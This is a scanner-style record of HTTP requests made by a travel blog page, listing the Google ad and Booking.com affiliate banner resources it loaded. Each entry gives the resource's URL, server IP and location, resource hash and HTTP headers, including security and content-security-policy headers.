X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
content-encoding: gzip
x-content-type-options: nosniff
age: 170905
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 49532
x-xss-protection: 0
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
server: sffe
date: Wed, 31 Mar 2021 03:42:42 GMT
vary: Accept-Encoding
content-type: application/x-javascript
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Thu, 31 Mar 2022 03:42:42 GMT

GET
H2 200 badbab77340f2a4336a65c2046024ac2a372bc1c.css
cf.bstatic.com/static/affiliate_base/css/affiliate_banner_1/ Frame 886F 6 KB
2 KB 30ms
9ms Stylesheet
text/css 2600:9000:2182:6a00:1f:e2ee:200:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL

https://cf.bstatic.com/static/affiliate_base/css/affiliate_banner_1/badbab77340f2a4336a65c2046024ac2a372bc1c.css

Requested by

Host: www.booking.com
URL: https://www.booking.com/flexiproduct.html?product=banner&w=250&h=250&lang=en-US&aid=1544504&target_aid=1544504&tmpl=affiliate_banner&fid=1617333067153&

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2182:6a00:1f:e2ee:200:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

e571a2adfb7928e9adccdab27f10b7bca469ea37929c9c43ca20e557a7734532

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Referer: https://www.booking.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Mon, 08 Mar 2021 11:24:07 GMT
content-encoding: br
age: 2130420
via: 1.1 8033f9c6b87a03b2eca7c2db5157e10e.cloudfront.net (CloudFront)
x-cache: Hit from cloudfront
x-xss-protection: 1; mode=block
last-modified: Wed, 10 Apr 2019 11:21:16 GMT
server: nginx
etag: W/"5cadd1ac-1890"
vary: Accept-Encoding
content-type: text/css
access-control-allow-origin: *
cache-control: max-age=2592000
x-amz-cf-pop: DUS51-C1
timing-allow-origin: *
x-amz-cf-id: i3XO8ygxw2QYsxLZGtLkvzoFdROdDIXxPVfB1o5YZ-Aij6DvScTnJA==
expires: Wed, 07 Apr 2021 11:24:07 GMT

GET
H3-Q050

200

si Show response
googleads.g.doubleclick.net/pagead/drt/ Frame EA74
Redirect Chain

https://www.google.com/pagead/drt/ui
https://googleads.g.doubleclick.net/pagead/drt/si

0
264 B

14ms
14ms

Document
text/html

2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/drt/si

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

safe /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/drt/si
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://googleads.g.doubleclick.net/
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: IDE=AHWqTUnAq8mxK8feip4Ax6w6Jk030xHJVvdgTTzWV1YIKsFDLzH4dvmA3yH7JM-TweM
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
date: Fri, 02 Apr 2021 03:11:07 GMT
server: safe
content-length: 0
x-xss-protection: 0
set-cookie: DSID=NO_DATA; expires=Fri, 02-Apr-2021 04:11:07 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:07 GMT
cache-control: private

Redirect headers

location: https://googleads.g.doubleclick.net/pagead/drt/si
cache-control: private
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
date: Fri, 02 Apr 2021 03:11:07 GMT
server: safe
content-length: 246
x-xss-protection: 0
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
H3-Q050 200 c1.jpg
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/ Frame E334 9 KB
9 KB 7ms
7ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/c1.jpg?1617143965200

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

28e3c5ce90d833f2245c960fb702ddb9bc95c4d2c1708e5db0a4402a48282886

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
x-content-type-options: nosniff
age: 170958
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 8769
x-xss-protection: 0
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
server: sffe
date: Wed, 31 Mar 2021 03:41:49 GMT
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Thu, 31 Mar 2022 03:41:49 GMT

GET
H/1.1 200
OK 39ede3ccebe0d92db6451ce95ed22d5ee2927efc.jpg
r.bstatic.com/static/affiliate_base/img/banners/branded_set_1/250_three/ Frame 886F 15 KB
16 KB 120ms
36ms Image
image/jpeg 5.57.16.100
BOOKING-BV Bookin...

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://r.bstatic.com/static/affiliate_base/img/banners/branded_set_1/250_three/39ede3ccebe0d92db6451ce95ed22d5ee2927efc.jpg

Requested by

Host: cf.bstatic.com
URL: https://cf.bstatic.com/static/affiliate_base/css/affiliate_banner_1/badbab77340f2a4336a65c2046024ac2a372bc1c.css

Protocol

HTTP/1.1

Security

TLS 1.3, , AES_128_GCM

Server

5.57.16.100 , Netherlands, ASN43996 (BOOKING-BV Booking.com, NL),

Reverse DNS

r.bstatic.com

Software

nginx /

Resource Hash

184c0514a96b76616a870c711d3fdf33b0c42cf5e542c33ba9e22b3d797ce44c

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Referer: https://cf.bstatic.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Wed, 10 Apr 2019 11:21:48 GMT
server: nginx
etag: "5cadd1cc-3dc7"
nel: {"report_to":"default","max_age":600}
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05}
content-type: image/jpeg
access-control-allow-origin: *
cache-control: max-age=2592000
accept-ranges: bytes
timing-allow-origin: *
content-length: 15815
x-xss-protection: 1; mode=block
expires: Sun, 02 May 2021 03:11:07 GMT

GET
H/1.1 200
OK a00df37609086c7793515a151e50d1eabae1cb47.png
q.bstatic.com/static/affiliate_base/img/banners/branded_set_1/curved_top_250/ Frame 886F 347 B
887 B 122ms
36ms Image
image/png 5.57.16.99
BOOKING-BV Bookin...

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://q.bstatic.com/static/affiliate_base/img/banners/branded_set_1/curved_top_250/a00df37609086c7793515a151e50d1eabae1cb47.png

Requested by

Host: cf.bstatic.com
URL: https://cf.bstatic.com/static/affiliate_base/css/affiliate_banner_1/badbab77340f2a4336a65c2046024ac2a372bc1c.css

Protocol

HTTP/1.1

Security

TLS 1.3, , AES_128_GCM

Server

5.57.16.99 , Netherlands, ASN43996 (BOOKING-BV Booking.com, NL),

Reverse DNS

q.bstatic.com

Software

nginx /

Resource Hash

8a21e1fd591c4181eb0d8acc51ea9efc38891ebb97db7049dfb07b95295c5fd8

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Referer: https://cf.bstatic.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Wed, 10 Apr 2019 11:21:48 GMT
server: nginx
etag: "5cadd1cc-15b"
nel: {"report_to":"default","max_age":600}
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05}
content-type: image/png
access-control-allow-origin: *
cache-control: max-age=2592000
accept-ranges: bytes
timing-allow-origin: *
content-length: 347
x-xss-protection: 1; mode=block
expires: Sun, 02 May 2021 03:11:07 GMT

GET
H/1.1 200
OK c7227f56e498e6a463fb9f059e88e36197263759.png
q.bstatic.com/static/affiliate_base/img/banners/bookingLogos/bookinglogo_123x20/ Frame 886F 5 KB
5 KB 125ms
37ms Image
image/png 5.57.16.99
BOOKING-BV Bookin...

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://q.bstatic.com/static/affiliate_base/img/banners/bookingLogos/bookinglogo_123x20/c7227f56e498e6a463fb9f059e88e36197263759.png

Requested by

Host: cf.bstatic.com
URL: https://cf.bstatic.com/static/affiliate_base/css/affiliate_banner_1/badbab77340f2a4336a65c2046024ac2a372bc1c.css

Protocol

HTTP/1.1

Security

TLS 1.3, , AES_128_GCM

Server

5.57.16.99 , Netherlands, ASN43996 (BOOKING-BV Booking.com, NL),

Reverse DNS

q.bstatic.com

Software

nginx /

Resource Hash

fc88580a590cde4632c65373bc5186b179f04c359fe99c665a18b6f85f6b7fa5

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Referer: https://cf.bstatic.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Wed, 10 Apr 2019 11:21:47 GMT
server: nginx
etag: "5cadd1cb-1272"
nel: {"report_to":"default","max_age":600}
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05}
content-type: image/png
access-control-allow-origin: *
cache-control: max-age=2592000
accept-ranges: bytes
timing-allow-origin: *
content-length: 4722
x-xss-protection: 1; mode=block
expires: Sun, 02 May 2021 03:11:07 GMT

GET
H2 200 beb5a35856de848cee8daf0016dd8dec9b1f8e4f.woff
cf.bstatic.com/static/fonts/affiliate_banners/opensans-regular-webfont/ Frame 886F 24 KB
25 KB 29ms
10ms Font
application/font-woff 2600:9000:2182:6a00:1f:e2ee:200:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL

https://cf.bstatic.com/static/fonts/affiliate_banners/opensans-regular-webfont/beb5a35856de848cee8daf0016dd8dec9b1f8e4f.woff

Requested by

Host: www.booking.com
URL: https://www.booking.com/flexiproduct.html?product=banner&w=250&h=250&lang=en-US&aid=1544504&target_aid=1544504&tmpl=affiliate_banner&fid=1617333067153&

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2182:6a00:1f:e2ee:200:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

9f06c5a5a26eed51ed7c0d94bd7bdb822cc503c1e619b463377c44e114e2ca5c

Security Headers

Name	Value
X-Xss-Protection	1; mode=block

Request headers

Origin: https://www.booking.com
Referer: https://www.booking.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Tue, 09 Mar 2021 17:53:15 GMT
via: 1.1 821feb380ab4aeca6ae9157aa1190ff2.cloudfront.net (CloudFront)
nel: {"report_to":"default","max_age":600}
age: 2020672
x-cache: Hit from cloudfront
content-length: 24852
x-xss-protection: 1; mode=block
last-modified: Wed, 10 Apr 2019 11:21:48 GMT
server: nginx
etag: "5cadd1cc-6114"
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05}
content-type: application/font-woff
access-control-allow-origin: *
cache-control: max-age=2592000
x-amz-cf-pop: DUS51-C1
timing-allow-origin: *
x-amz-cf-id: cFr6Wz8J7fo_Xfx8D2TFaVIsTBl7SM6gsICZqIVUDQuCLB2XzwWMlw==
expires: Thu, 08 Apr 2021 17:53:15 GMT

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame E334 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/pagead/gadgets/html5/addata.js

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61873
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H3-Q050 200 c2.jpg
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/ Frame E334 8 KB
8 KB 7ms
6ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/c2.jpg?1617143965200

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

24cbca0ed88285ae9e7f36b5d44662d4cadd4ccdcc72e89c83b5291ce2950c11

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
x-content-type-options: nosniff
age: 170958
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 8487
x-xss-protection: 0
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
server: sffe
date: Wed, 31 Mar 2021 03:41:49 GMT
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Thu, 31 Mar 2022 03:41:49 GMT

GET
H3-Q050 200 c3.jpg
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/ Frame E334 8 KB
8 KB 7ms
6ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/images/c3.jpg?1617143965200

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

5c3b6a1bb44797d2090c3cd0df14e5930f21764bec666d2b642a7ce221a08380

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
x-content-type-options: nosniff
age: 170958
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
